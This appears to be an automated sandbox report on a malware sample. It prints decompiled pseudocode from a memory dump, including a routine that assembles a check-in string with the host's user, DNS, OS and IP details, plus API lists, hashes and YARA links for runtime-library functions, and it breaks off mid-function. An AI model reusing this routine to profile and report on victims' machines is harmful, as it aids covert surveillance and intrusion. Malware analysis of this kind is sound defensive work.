				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2c9d018; // 0x7c62a60e
				asm("bswap eax");
				_t27 =  *0x2c9d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2c9d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x2c9d00c; // 0x13d015ef
				asm("bswap eax");
				_t30 =  *0x2c9d2a4; // 0x24aa5a8
				_t3 = _t30 + 0x2c9e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d154, _t29, _t28, _t27, _t26,  *0x2c9d02c,  *0x2c9d004, _t25);
				_t33 = E02C92914();
				_t34 =  *0x2c9d2a4; // 0x24aa5a8
				_t4 = _t34 + 0x2c9e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E02C93F0E(_t91);
				if(_t96 != 0) {
					_t83 =  *0x2c9d2a4; // 0x24aa5a8
					_t6 = _t83 + 0x2c9e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2c9d238, 0, _t96);
				}
				_t97 = E02C91363();
				if(_t97 != 0) {
					_t78 =  *0x2c9d2a4; // 0x24aa5a8
					_t8 = _t78 + 0x2c9e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2c9d238, 0, _t97);
				}
				_t98 =  *0x2c9d32c; // 0x51495b0
				_a32 = E02C918D5(0x2c9d00a, _t98 + 4);
				_t42 =  *0x2c9d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2c9d2a4; // 0x24aa5a8
					_t11 = _t74 + 0x2c9e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2c9d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2c9d2a4; // 0x24aa5a8
					_t13 = _t71 + 0x2c9e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2c9d238, 0, 0x800);
					if(_t100 != 0) {
						E02C96852(GetTickCount());
						_t50 =  *0x2c9d32c; // 0x51495b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2c9d32c; // 0x51495b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2c9d32c; // 0x51495b0
						_t103 = E02C98840(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2c9c2ac);
							_push(_t103);
							_t62 = E02C98007();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02C96146(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02C945F1();
								}
								HeapFree( *0x2c9d238, 0, _v44);
							}
							HeapFree( *0x2c9d238, 0, _t103);
						}
						HeapFree( *0x2c9d238, 0, _t100);
					}
					HeapFree( *0x2c9d238, 0, _a24);
				}
				HeapFree( *0x2c9d238, 0, _t105);
				return _a12;
			}

0x02c92941
0x02c92941
0x02c92941
0x02c92946
0x02c9294c
0x02c92956
0x02c92958
0x02c92958
0x02c92965
0x02c92970
0x02c92973
0x02c9297e
0x02c92981
0x02c92986
0x02c92989
0x02c9298e
0x02c92991
0x02c9299d
0x02c929aa
0x02c929ac
0x02c929b2
0x02c929b7
0x02c929c2
0x02c929c4
0x02c929c7
0x02c929ce
0x02c929d2
0x02c929d4
0x02c929d9
0x02c929e5
0x02c929e7
0x02c929f3
0x02c929f5
0x02c929f5
0x02c92a00
0x02c92a04
0x02c92a06
0x02c92a0b
0x02c92a17
0x02c92a19
0x02c92a25
0x02c92a27
0x02c92a27
0x02c92a2d
0x02c92a40
0x02c92a44
0x02c92a4b
0x02c92a4e
0x02c92a53
0x02c92a5e
0x02c92a60
0x02c92a63
0x02c92a63
0x02c92a65
0x02c92a6c
0x02c92a6f
0x02c92a74
0x02c92a7e
0x02c92a80
0x02c92a88
0x02c92aa1
0x02c92aa5
0x02c92ab1
0x02c92ab6
0x02c92abf
0x02c92ad0
0x02c92ad4
0x02c92add
0x02c92ae3
0x02c92af0
0x02c92afd
0x02c92b03
0x02c92b0f
0x02c92b15
0x02c92b16
0x02c92b1b
0x02c92b21
0x02c92b27
0x02c92b2e
0x02c92b35
0x02c92b3b
0x02c92b42
0x02c92b46
0x02c92b51
0x02c92b56
0x02c92b5c
0x02c92b65
0x02c92b65
0x02c92b76
0x02c92b76
0x02c92b85
0x02c92b85
0x02c92b94
0x02c92b94
0x02c92ba6
0x02c92ba6
0x02c92bb5
0x02c92bc6

APIs

GetTickCount.KERNEL32 ref: 02C92958
wsprintfA.USER32 ref: 02C929A5
wsprintfA.USER32 ref: 02C929C2
wsprintfA.USER32 ref: 02C929E5
HeapFree.KERNEL32(00000000,00000000), ref: 02C929F5
wsprintfA.USER32 ref: 02C92A17
HeapFree.KERNEL32(00000000,00000000), ref: 02C92A27
wsprintfA.USER32 ref: 02C92A5E
wsprintfA.USER32 ref: 02C92A7E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02C92A9B
GetTickCount.KERNEL32 ref: 02C92AAB
RtlEnterCriticalSection.NTDLL(05149570), ref: 02C92ABF
RtlLeaveCriticalSection.NTDLL(05149570), ref: 02C92ADD

Part of subcall function 02C98840: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02C92AF0,?,051495B0), ref: 02C9886B
Part of subcall function 02C98840: lstrlen.KERNEL32(?,?,?,02C92AF0,?,051495B0), ref: 02C98873
Part of subcall function 02C98840: strcpy.NTDLL ref: 02C9888A
Part of subcall function 02C98840: lstrcat.KERNEL32(00000000,?), ref: 02C98895
Part of subcall function 02C98840: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02C92AF0,?,051495B0), ref: 02C988B2

StrTrimA.SHLWAPI(00000000,02C9C2AC,?,051495B0), ref: 02C92B0F

Part of subcall function 02C98007: lstrlen.KERNEL32(05149918,00000000,00000000,770CC740,02C92B1B,00000000), ref: 02C98017
Part of subcall function 02C98007: lstrlen.KERNEL32(?), ref: 02C9801F
Part of subcall function 02C98007: lstrcpy.KERNEL32(00000000,05149918), ref: 02C98033
Part of subcall function 02C98007: lstrcat.KERNEL32(00000000,?), ref: 02C9803E

lstrcpy.KERNEL32(00000000,?), ref: 02C92B2E
lstrcpy.KERNEL32(00000000,00000000), ref: 02C92B35
lstrcat.KERNEL32(00000000,?), ref: 02C92B42
lstrcat.KERNEL32(00000000,00000000), ref: 02C92B46

Part of subcall function 02C96146: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,747C81D0), ref: 02C961F8

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02C92B76
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C92B85
HeapFree.KERNEL32(00000000,00000000,?,051495B0), ref: 02C92B94
HeapFree.KERNEL32(00000000,00000000), ref: 02C92BA6
HeapFree.KERNEL32(00000000,?), ref: 02C92BB5

Strings

Uxt, xrefs: 02C929F5, 02C92A27, 02C92B76, 02C92B85, 02C92B94, 02C92BA6, 02C92BB5

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID: Uxt
API String ID: 3080378247-1536154274
Opcode ID: f339ac7354737d4cca9f477777de654413fb0acf33c9f280e94443f3d0b8bbe7
Instruction ID: f83d89b20d76102534133cfa1a4727eac7097991456f734b809bb72ad490fe33
Opcode Fuzzy Hash: f339ac7354737d4cca9f477777de654413fb0acf33c9f280e94443f3d0b8bbe7
Instruction Fuzzy Hash: 5361F231980201AFCB21EB74EC8CF167BE8EF48704F050A15FA4AE7250DB35DA25DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B04F0, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 276COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B04F9
operator+.LIBVCRUNTIMED ref: 6E1B052E
DName::isEmpty.LIBCMTD ref: 6E1B0541
Mailbox.LIBCMTD ref: 6E1B0595
DName::setPtrRef.LIBCMTD ref: 6E1B05AC
char_traits.LIBCPMTD ref: 6E1B05BA
operator+.LIBVCRUNTIMED ref: 6E1B0601

Strings

B, xrefs: 6E1B0509

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: operator+$EmptyIterator_baseIterator_base::_MailboxName::isName::setchar_traitsstd::_
String ID: B
API String ID: 1073764026-1255198513
Opcode ID: 67aa0c9e5a48e360b2b74ec5daf43ddba619f7875a0019d0e6fa32fe3691c0d6
Instruction ID: 9e6e967aa0adfa82ea4f13d8bd4d223f68c6808cf14f3ac373ca687b83ff4b30
Opcode Fuzzy Hash: 67aa0c9e5a48e360b2b74ec5daf43ddba619f7875a0019d0e6fa32fe3691c0d6
Instruction Fuzzy Hash: 62B140B5D44208EFCF04DFA8EA95AED77B9BB45304F048518FA095B291E771AAC0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3A40, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B3A9B
Mailbox.LIBCMTD ref: 6E1B3AC0
DName::operator=.LIBVCRUNTIMED ref: 6E1B3B18
und_strncmp.LIBCMTD ref: 6E1B3B55
DName::getString.LIBCMTD ref: 6E1B3C1D
Mailbox.LIBCMTD ref: 6E1B3C70

Part of subcall function 6E1A9700: DName::DName.LIBVCRUNTIMED ref: 6E1A9718

Replicator::isFull.LIBCMTD ref: 6E1B3D42
Replicator::operator+=.LIBCMTD ref: 6E1B3D55
Mailbox.LIBCMTD ref: 6E1B3D61

Strings

@, xrefs: 6E1B3AE0

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$FullIterator_baseIterator_base::_NameName::Name::getName::operator=Replicator::isReplicator::operator+=Stringstd::_und_strncmp
String ID: @
API String ID: 3194277874-2766056989
Opcode ID: 5bb2e4703a8f434570a3d6e16202f77ffd23e95e630247e21fca5f1db0721971
Instruction ID: dfb2ff889010247d1f5e83b86f747e1c0771c71a326ff1444d6b9c0c84f8cdc8
Opcode Fuzzy Hash: 5bb2e4703a8f434570a3d6e16202f77ffd23e95e630247e21fca5f1db0721971
Instruction Fuzzy Hash: 77A18275D002089FCF44CFE8DD94AEEBBF9BF49304F108569E505AB284DBB16985DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1F5F20, Relevance: 34.8, APIs: 23, Instructions: 321timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E1F5FE3
__MarkAllocaS.LIBCMTD ref: 6E1F5FEC
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1F6007
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1F6012
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F6030

Part of subcall function 6E1E81B0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E1E81E3

std::_Mutex::_Lock.LIBCPMTD ref: 6E1F606D
std::_Mutex::_Lock.LIBCPMTD ref: 6E1F60B0

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide__wcstombs_l
String ID:
API String ID: 3719586419-0
Opcode ID: 225ef4a318be00b86850c084a0bc4d721ca262d33e15811d1792d5591c30fb72
Instruction ID: ac765f11638508bcd6ff867d2b015945cfeaec191da4999250ea72de8436d911
Opcode Fuzzy Hash: 225ef4a318be00b86850c084a0bc4d721ca262d33e15811d1792d5591c30fb72
Instruction Fuzzy Hash: A1C1F9B191410DEBDB04DFD4DD91FDEB7B8AB58308F104558E515AB280EB70AE86EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC550, Relevance: 33.2, APIs: 22, Instructions: 210COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMTD ref: 6E1AC59A
DName::operator+.LIBCMTD ref: 6E1AC5AB
DName::isEmpty.LIBCMTD ref: 6E1AC718
operator+.LIBVCRUNTIMED ref: 6E1AC743
DName::operator+.LIBCMTD ref: 6E1AC75C
DName::operator+.LIBCMTD ref: 6E1AC770
DName::operator+.LIBCMTD ref: 6E1AC784

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::operator+$EmptyName::isoperator+
String ID:
API String ID: 2054230242-0
Opcode ID: 550124a08fe7e4d41584b5fd21b168b9e0419e6d1d63655fb7c27e519aec7711
Instruction ID: 19211e64aeb0a46d93dc5e8ef4d825db0860420e91b207c37f7ff1769d94d7d7
Opcode Fuzzy Hash: 550124a08fe7e4d41584b5fd21b168b9e0419e6d1d63655fb7c27e519aec7711
Instruction Fuzzy Hash: 10810DB9D00108AFDB04DFE8ECA0BFE77B9AF54304F508569E619AB180EB715AC4DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AC8E0, Relevance: 30.3, APIs: 20, Instructions: 327COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AC927
Mailbox.LIBCMTD ref: 6E1ACDD4
DName::isEmpty.LIBCMTD ref: 6E1ACDDC
Mailbox.LIBCMTD ref: 6E1ACDEC
operator+.LIBVCRUNTIMED ref: 6E1ACE5B
Mailbox.LIBCMTD ref: 6E1ACE67
operator+.LIBVCRUNTIMED ref: 6E1ACE9E
Mailbox.LIBCMTD ref: 6E1ACEAA
operator+.LIBVCRUNTIMED ref: 6E1ACF05
Mailbox.LIBCMTD ref: 6E1ACF11
DName::isEmpty.LIBCMTD ref: 6E1ACF19
operator+.LIBVCRUNTIMED ref: 6E1ACF2F
Mailbox.LIBCMTD ref: 6E1ACF47
operator+.LIBVCRUNTIMED ref: 6E1AD0A6

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$operator+$EmptyName::is$Iterator_baseIterator_base::_std::_
String ID:
API String ID: 2623725463-0
Opcode ID: f2dee6bb2c080024a83daf459fd12ea735dbb179d8504ead497bd81f58e395d0
Instruction ID: cf93bef791f0562ee2e81b2f98342ec716b6691b6624b6bfd26cf2c10e592fb4
Opcode Fuzzy Hash: f2dee6bb2c080024a83daf459fd12ea735dbb179d8504ead497bd81f58e395d0
Instruction Fuzzy Hash: 4CD15EB9C00209ABCB15DFE8EC60AFDBBB8AF55304F04455AE6167A240EB3157C5DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AEBE0, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AEBE9
DName::DName.LIBVCRUNTIMED ref: 6E1AEC72
DName::DName.LIBVCRUNTIMED ref: 6E1AECED
DName::DName.LIBVCRUNTIMED ref: 6E1AED05
DName::DName.LIBVCRUNTIMED ref: 6E1AED6C

Part of subcall function 6E1A92D0: __aullrem.LIBCMT ref: 6E1A9317
Part of subcall function 6E1A92D0: __aulldiv.LIBCMT ref: 6E1A9330

DName::operator+.LIBCMTD ref: 6E1AED79

Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9870
Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9888

Mailbox.LIBCMTD ref: 6E1AED82
DName::operator+.LIBCMTD ref: 6E1AED90
Mailbox.LIBCMTD ref: 6E1AED99
DName::operator+.LIBCMTD ref: 6E1AEDC4

Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98B0
Part of subcall function 6E1A98A0: DName::operator+=.LIBCMTD ref: 6E1A98BD
Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98C9

Mailbox.LIBCMTD ref: 6E1AEDCD
DName::operator+=.LIBCMTD ref: 6E1AEDF5

Part of subcall function 6E1A9C00: DName::isValid.LIBCMTD ref: 6E1A9C0A
Part of subcall function 6E1A9C00: DName::isEmpty.LIBCMTD ref: 6E1A9C16
Part of subcall function 6E1A9C00: DName::operator=.LIBVCRUNTIMED ref: 6E1A9C32

DName::setIsComArray.LIBCMTD ref: 6E1AEDFD
Mailbox.LIBCMTD ref: 6E1AEE09
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AEE16

Strings

C, xrefs: 6E1AEC12

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$NameName::$Name::operator+$Iterator_baseIterator_base::_Name::isName::operator+=std::_$ArrayEmptyName::operator=Name::setValid__aulldiv__aullrem
String ID: C
API String ID: 961569035-1037565863
Opcode ID: 5acf4359a59f2edc5664a2261620d431841b93b89095a5d2e10e62a9cdb6af37
Instruction ID: bd0f1332b8db6f3fb8bec6d9285b927678961dc274011ec9b26056acbe51a61a
Opcode Fuzzy Hash: 5acf4359a59f2edc5664a2261620d431841b93b89095a5d2e10e62a9cdb6af37
Instruction Fuzzy Hash: A8619E38544245DFDF48CFA8DAA4BFE77B6BB52304F108559E6025B2D4CBB1AAC0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3840, Relevance: 25.7, APIs: 17, Instructions: 154COMMON

Download Yara Rule

APIs

Mailbox.LIBCMTD ref: 6E1B384D
DName::isValid.LIBCMTD ref: 6E1B3855
DName::operator+.LIBCMTD ref: 6E1B388B

Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98B0
Part of subcall function 6E1A98A0: DName::operator+=.LIBCMTD ref: 6E1A98BD
Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98C9

DName::operator+.LIBCMTD ref: 6E1B389E

Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9870
Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9888

Mailbox.LIBCMTD ref: 6E1B38A7
DName::isValid.LIBCMTD ref: 6E1B38AF

Part of subcall function 6E1A9990: DName::isValid.LIBCMTD ref: 6E1A999C
Part of subcall function 6E1A9990: DName::isEmpty.LIBCMTD ref: 6E1A99B1

DName::isValid.LIBCMTD ref: 6E1B38F2
operator+.LIBVCRUNTIMED ref: 6E1B3934

Part of subcall function 6E1A97C0: DName::operator+.LIBCMTD ref: 6E1A97E1

DName::operator+.LIBCMTD ref: 6E1B3948

Part of subcall function 6E1A9A30: DName::isValid.LIBCMTD ref: 6E1A9A3C
Part of subcall function 6E1A9A30: DName::isEmpty.LIBCMTD ref: 6E1A9A48
Part of subcall function 6E1A9A30: DName::isEmpty.LIBCMTD ref: 6E1A9A54
Part of subcall function 6E1A9A30: DName::operator=.LIBVCRUNTIMED ref: 6E1A9A69

DName::isValid.LIBCMTD ref: 6E1B3976
DName::isValid.LIBCMTD ref: 6E1B39B6
DName::operator+=.LIBCMTD ref: 6E1B39D1
DName::operator+=.LIBCMTD ref: 6E1B39DB

Part of subcall function 6E1B0FE0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0FEC
Part of subcall function 6E1B0FE0: Mailbox.LIBCMTD ref: 6E1B1044

DName::isValid.LIBCMTD ref: 6E1B3A00
operator+.LIBVCRUNTIMED ref: 6E1B3A13
Mailbox.LIBCMTD ref: 6E1B3A1F
Mailbox.LIBCMTD ref: 6E1B3A2B

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name::is$Mailbox$Valid$Name::operator+$EmptyName::operator+=$operator+$Iterator_baseIterator_base::_Name::operator=std::_
String ID:
API String ID: 1123558639-0
Opcode ID: b69a99584c96666b5eed580c4d9a0fedee6d040b2210f11a19a78df6210a0f52
Instruction ID: c23df24459d10472a746662df6b9f5129eaf0e88a025121dc907b4bc9951c089
Opcode Fuzzy Hash: b69a99584c96666b5eed580c4d9a0fedee6d040b2210f11a19a78df6210a0f52
Instruction Fuzzy Hash: FC51F270D0014A9BDF04DFE4DAA59FE77BDAF11304F204169E603A6180EBB1AEC5DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE490, Relevance: 24.2, APIs: 16, Instructions: 187COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1AE4CE
operator+.LIBVCRUNTIMED ref: 6E1AE543

Part of subcall function 6E1A9790: DName::operator+.LIBCMTD ref: 6E1A97B0

DName::DName.LIBVCRUNTIMED ref: 6E1AE534

Part of subcall function 6E1A92D0: __aullrem.LIBCMT ref: 6E1A9317
Part of subcall function 6E1A92D0: __aulldiv.LIBCMT ref: 6E1A9330

DName::DName.LIBVCRUNTIMED ref: 6E1AE57C
Mailbox.LIBCMTD ref: 6E1AE591
DName::DName.LIBVCRUNTIMED ref: 6E1AE5FA
operator+.LIBVCRUNTIMED ref: 6E1AE609
DName::DName.LIBVCRUNTIMED ref: 6E1AE621
Mailbox.LIBCMTD ref: 6E1AE636

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: NameName::$Mailboxoperator+$Name::operator+__aulldiv__aullrem
String ID:
API String ID: 2030757049-0
Opcode ID: 764b4a46f4062e035f9669fbfe65f74379ddcfce958196c2b50791855c9978c1
Instruction ID: 52269ed1f39fc7b3cd02d3f9f4a0a62404f4673ec879cb519a8a50e1865ae97b
Opcode Fuzzy Hash: 764b4a46f4062e035f9669fbfe65f74379ddcfce958196c2b50791855c9978c1
Instruction Fuzzy Hash: 317142B4D04508AFCF04CFE9D5A09FEBBF9AF49304F108559E6159B250D731AA81DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1C50, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B1C5D
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B1CC3
Mailbox.LIBCMTD ref: 6E1B1CFE
Mailbox.LIBCMTD ref: 6E1B1E10
Mailbox.LIBCMTD ref: 6E1B1E27
Replicator::isFull.LIBCMTD ref: 6E1B1E40
Replicator::operator+=.LIBCMTD ref: 6E1B1E53
DName::isEmpty.LIBCMTD ref: 6E1B1E5B
DName::operator+=.LIBCMTD ref: 6E1B1E71
DName::isValid.LIBCMTD ref: 6E1B1EB0
DName::DName.LIBVCRUNTIMED ref: 6E1B1EBE
Mailbox.LIBCMTD ref: 6E1B1EDB

Strings

6, xrefs: 6E1B1D4F

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Iterator_baseIterator_base::_Name::isstd::_$EmptyFullNameName::Name::operator+=Replicator::isReplicator::operator+=Valid
String ID: 6
API String ID: 2413373717-498629140
Opcode ID: 46baf94f3c1451638f40d6a882f26b556337f8de84ec26c537f4bcefb158be94
Instruction ID: b99a3c5283fded43987160f2bbb39519f80f67c197164c23b17e77d69c3b1964
Opcode Fuzzy Hash: 46baf94f3c1451638f40d6a882f26b556337f8de84ec26c537f4bcefb158be94
Instruction Fuzzy Hash: 5771E530A44244DFCF45CBE4DAA4BEE7BF6AF12304F158599D641A7280D7719AC8DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1EA0A0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

<program name unknown>, xrefs: 6E1EA17D

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID:
String ID: <program name unknown>
API String ID: 0-554726554
Opcode ID: cdec2e1ff8766d35109147ba3464e75d1cac8c5e04fd3fac3648883687a5771a
Instruction ID: f68d421bdc5adeac7a6b08024c9ca815996f2db16533640126aba5a768b537fa
Opcode Fuzzy Hash: cdec2e1ff8766d35109147ba3464e75d1cac8c5e04fd3fac3648883687a5771a
Instruction Fuzzy Hash: 7B4126B5E4020CBBDB14EAE49C12FDE776A6F54308F148524FA047F382E6719B50DB91

Uniqueness

Uniqueness Score: -1.00%

Function 02C9AD95, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E02C9AD95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2c90000;
				_t115 = _t139[3] + 0x2c90000;
				_t131 = _t139[4] + 0x2c90000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2c90000;
				_v16 = _t139[5] + 0x2c90000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2c90002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2c9d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2c9d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2c9d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2c9d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2c9d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2c9d198; // 0x0
										 *_t102 = _t125;
